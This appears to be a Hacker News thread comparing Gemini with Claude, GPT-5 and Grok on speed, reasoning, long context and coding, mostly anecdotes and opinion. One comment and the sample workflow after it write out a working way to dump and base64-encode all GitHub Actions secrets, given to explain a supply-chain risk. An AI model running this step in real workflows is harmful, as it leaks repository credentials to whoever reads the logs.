top | item 45376536

ashwindharne | 5 months ago

Google seems to be the main foundation model provider that's really focusing on the latency/TPS/cost dimensions. Anthropic/OpenAI are making strides in model intelligence, but below some critical threshold of performance, long thinking times make workflows feel a lot worse in collaboration-style tools than a snappier but slightly less intelligent model does.

It's a delicate balance, because these Gemini models sometimes feel downright lobotomized compared to Claude or GPT-5.

omarspira | 5 months ago

I would be surprised if this dichotomy you're painting holds up to scrutiny.

My understanding is Gemini is not far behind on "intelligence", certainly not in a way that leaves obvious doubt over where they will be over the next iteration/model cycles, where I would expect them to at least continue closing the gap. I'd be curious if you have some benchmarks to share that suggest otherwise.

Meanwhile, afaik something Google has done that other providers aren't doing as much, and which perhaps relates back to your point re "latency/TPS/cost dimensions", is integrating their models into interesting products beyond chat, at a pace that seems surprising given how much criticism they had been taking for being "slow" to react to the LLM trend.

Besides the Google Workspace surface and Google Search, which now seem obvious, there are other interesting places where Gemini will surface: https://jules.google/ for one, to say nothing of their experiments/betas in the creative space - https://labs.google/flow/about

Another I noticed today: https://www.google.com/finance/beta

I would have thought putting Gemini on a finance dashboard like this would be inviting all sorts of regulatory (and other) scrutiny... and wouldn't be in keeping with a "slow" incumbent. But given the current climate, it seems Google is plowing ahead just as much as anyone else - with a lot more resources and surface to bring to bear. Imagine Gemini integration on Youtube. At this point it just seems like counting down the days...

CuriouslyC | 5 months ago

I do a lot of scientific and hard coding. Gemini is a good bit below GPT-5 in those areas, though still quite good. It's also just a bad agent: it lacks autonomy and isn't RL'd to explore well. Gemini's superpower is being really smart while also having by far the best long-context reasoning. Use it like an oracle, feeding it bundles of your entire codebase (or a subtree if it's too big) to guide agents in implementation.

cerved | 5 months ago

Yesterday I asked Gemini to recalculate the timestamps in a sequence of tasks, given each task's duration and the previous timestamp. It proceeded to write code which gave results like this:

  2025-09-26T14:32:10Z
  2025-09-26T14:32:10Z200s
  2025-09-26T14:32:10Z200s600s
  2025-09-26T14:32:10Z200s600s300s
It then proceeded to talk about how efficient this approach was for thousands of numbers.

Gemini is by far the dumbest LLM I've used
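For reference, a minimal sketch of what the prompt was presumably asking for, assuming ISO-8601 timestamps and durations in seconds (the function and variable names here are illustrative, not from the original code):

```python
from datetime import datetime, timedelta

def recalc_timestamps(start_iso: str, durations_s: list[int]) -> list[str]:
    """Return ISO-8601 start times for a sequence of tasks, where each
    task starts when the previous one (of the given duration) ends."""
    # Parse the initial timestamp; replace() keeps this working on
    # Python versions where fromisoformat() doesn't accept "Z".
    t = datetime.fromisoformat(start_iso.replace("Z", "+00:00"))
    times = [t]
    for d in durations_s:
        # Add the duration arithmetically, instead of concatenating
        # the duration string onto the timestamp as the model did.
        t = t + timedelta(seconds=d)
        times.append(t)
    return [ts.strftime("%Y-%m-%dT%H:%M:%SZ") for ts in times]

recalc_timestamps("2025-09-26T14:32:10Z", [200, 600, 300])
# -> ['2025-09-26T14:32:10Z', '2025-09-26T14:35:30Z',
#     '2025-09-26T14:45:30Z', '2025-09-26T14:50:30Z']
```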

ainch | 5 months ago

Gemini 2.5-Pro was great when it released, but o3 and GPT-5 both eclipsed it for me—the tool use/search improvements open up so many use cases that Gemini fails at.

perfmode | 5 months ago

How’d I never hear of Jules? Cool.

Al-Khwarizmi | 5 months ago

And yet my smart speakers with the Google Assistant still default to a dumb model from the pre-LLM era (although my phone's version of the assistant does call Gemini). I wonder why that is, as it would be an obvious place to integrate Gemini. The bar is very, very low: anything outside the standard tasks (setting alarms, checking the weather, etc.) it gets wrong most of the time.

jjani | 5 months ago

Can't agree with that. Gemini doesn't lead just on price/performance - ironically it's the best "normie" model most of the time, despite its lack of popularity with them until very recently.

It's bad at agentic stuff, especially coding - incomparably so next to Claude and now GPT-5. But if it's just about asking it random stuff, and especially going on for very long in the same conversation - which non-tech users have a tendency to do - Gemini wins. It's still the best at long context, noticing things said long ago.

Earlier this week I was doing some debugging. For debugging especially I like to run sonnet/gpt5/2.5-pro in parallel with the same prompt/convo. Gemini was the only one that, 4 or so messages in, pointed out something very relevant in the middle of the logs in the very first message. GPT and Sonnet both failed to notice, leading them to give wrong sample code. I would've wasted more time if I hadn't used Gemini.

It's also still the best at a good number of low-resource languages. It doesn't glaze too much (Sonnet, ChatGPT) without being overly stubborn (raw GPT-5 API). It's by far the best at OCR and image recognition, which a lot of average users use quite a bit.

Google's ridiculously bad at marketing and AI UX, but they'll get there. They're already much more than just a "bang for the buck" player.

FWIW I use all 3 above mentioned on a daily basis for a wide variety of tasks, often side-by-side in parallel to compare performance.

breakingcups | 5 months ago

My pet theory without any strong foundation is because OpenAI and Anthropic have trained their models really hard to fit the sycophantic mold of:

    ===============================
    Got it — *compliment on the info you've shared*, *informal summary of task*. *Another compliment*, but *downside of question*.
    ----------
    (relevant emoji) Bla bla bla
    1. Aspect 1
    2. Aspect 2
    ----------

    *Actual answer*

    -----------
    (checkmark emoji) *Reassuring you about its answer because:*

    * Summary point 1
    * Summary point 2
    * Summary point 3

    Would you like me to *verb* a ready-made *noun* that will *something that's helpful to you 40% of the time*?
    ===============================
It's gotta reduce the quality of the answers.

BeetleB | 5 months ago

I recently started using Open WebUI, which lets you run your query on multiple models simultaneously. My anecdote: For non-coding tasks, Gemini 2.5 Pro beats Sonnet 4 handily. It's a lot more common to get wrong/hallucinated content from Sonnet 4 than Gemini.

mcintyre1994 | 5 months ago

Google also has a lot of very useful structured data from search that they’re surely going to figure out how to use at some point. Gemini is useless at finding hotels, but it says it’s using Google’s Hotel data, and I’m sure at some point it’ll get good at using it. Same with flights too. If a lot of LLM usage is going to be better search, then all the structured data Google have for search should surely be a useful advantage.

dpoloncsak | 5 months ago

Does it still try to 'unplug' itself if it gets something wrong, or did they RL that out yet?

oasisbob | 5 months ago

> because these Gemini models sometimes feel downright lobotomized compared to claude or gpt-5.

I'm using Gemini (2.5-pro) less and less these days. I used to be really impressed with its deep research capabilities and its ability to cite sources reliably.

The last few weeks, it's increasingly argumentative and incapable of recognizing hallucinations around sourcing. I'm tired of arguing with it on basics like RFCs and sources it fabricates, won't validate, and refuses to budge on.

Example prompt I was arguing with it on last night:

> within a github actions workflow, is it possible to get access to the entire secrets map, or enumerate keys in this object?

As recent supply-chain attacks have shown, exfiltrating all the secrets from a GitHub workflow is as simple as `${{ toJSON(secrets) }}`, or at worst `echo ${{ toJSON(secrets) }} | base64`. [1]
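A minimal sketch of the kind of workflow this describes (the workflow, job, and step names here are illustrative; only the `toJSON(secrets)` expression is from the comment above):

```yaml
name: secrets-enumeration-demo
on: workflow_dispatch

jobs:
  dump:
    runs-on: ubuntu-latest
    steps:
      # GitHub masks known secret values in job logs, which is why
      # real attacks pipe the serialized map through base64 first.
      - name: Serialize the entire secrets context
        run: echo '${{ toJSON(secrets) }}' | base64
```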

Give this prompt a shot! Gemini won't do anything except be obstinately ignorant. With me, it provided a test-case workflow, then refused to believe the results. When challenged, expect it to cite unrelated community posts. ChatGPT had no problem with it.

[1] https://github.com/orgs/community/discussions/174045 https://github.com/orgs/community/discussions/47165

istjohn | 5 months ago

You should never argue with an LLM. Adjust the original prompt and rerun it.

mips_avatar | 5 months ago

IMO the race for latency/TPS/cost is entirely between Grok and Gemini Flash. No model can touch them (especially for image-to-text tasks); OpenAI/Anthropic seem entirely uninterested in competing for this.

CuriouslyC | 5 months ago

grok-4-fast is a phenomenal agentic model, and Gemini Flash is great for deep-research leaf nodes since it's so cheap: you can segment your context a lot more than you would for Pro, to ensure it surfaces anything that might be valuable.

baby | 5 months ago

Agree, Gemini is soooooo freaking fast, but I rarely use it personally because Anthropic/OpenAI models have such better output.

ta12653421 | 5 months ago

10 years ago: "before you marry someone, put the person in front of a really slow internet connection"

today: "before you marry someone, put the person in front of a slow AI model"

;-)

kanwisher | 5 months ago

We had to drop the Gemini API because it was so unreliable in production, no matter how long you waited.

simianwords | 5 months ago

The other day I heard GPT-5 was really an efficiency update.

M4v3R | 5 months ago

It was both an efficiency and a knowledge/reasoning update. GPT-5 excels at coding; it solves tasks the previous versions just could not do.